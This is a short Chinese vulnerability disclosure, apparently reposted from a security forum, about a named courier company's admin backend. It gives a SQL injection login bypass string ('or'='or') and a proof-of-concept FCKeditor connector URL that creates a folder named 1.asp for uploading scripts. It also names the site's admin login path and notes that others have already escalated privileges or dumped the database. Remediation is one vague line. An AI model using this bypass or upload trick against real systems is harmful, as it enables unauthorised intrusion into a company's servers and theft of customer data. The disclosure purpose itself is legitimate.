后台登录页面 使用'or'='or' 直接登录,fckeditor编辑器构造表单上传。之前已经有大黑阔提权,或者脱裤。 漏洞 证明: http://HdhCmsTestnd56测试数据/fckeditor/editor/filemanager/connectors/ asp x/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp 后台http://HdhCmsTestnd56测试数据/e9web-admin/login.htm 修复方案: 过滤,fckeditor该删的删除该改的改。 作者deeRix
查看更多关于港中能达快递后台登录页面注入及fckeditor编辑器的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12240